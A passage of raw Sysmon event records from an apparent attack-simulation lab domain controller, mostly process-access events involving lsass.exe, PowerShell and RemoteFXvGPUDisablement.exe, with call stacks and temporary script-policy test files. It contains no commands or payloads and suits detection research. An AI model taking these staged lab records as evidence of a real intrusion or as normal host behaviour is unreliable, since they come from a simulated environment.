15:51:04.191{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.066{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.066{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.066{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.066{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:03.097{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_nmlcgf0e.kse.ps12020-11-03 15:51:03.097 11241100x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.972{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_drcvwb13.zqb.ps12020-11-03 15:51:02.972 11241100x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.972{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ecebs2is.wh4.ps12020-11-03 15:51:02.972 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.847{D28789B6-7C64-5FA1-1300-000000008801}12241500C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.847{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.847{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.832{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.832{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.832{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.457{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:02.457{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.519{D28789B6-7C65-5FA1-2100-000000008801}23202508C:\Windows\system32\conhost.exe{D28789B6-7C65-5FA1-2000-000000008801}2308C:\Windows\System32\dsregcmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.519{D28789B6-7C65-5FA1-1B00-000000008801}21762504C:\Windows\system32\conhost.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.519{D28789B6-7C65-5FA1-1F00-000000008801}22762500C:\Windows\system32\conhost.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.519{D28789B6-7C65-5FA1-2300-000000008801}24362492C:\Windows\system32\conhost.exe{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.519{D28789B6-7C65-5FA1-1C00-000000008801}21842496C:\Windows\system32\conhost.exe{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.488{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.425{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.425{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 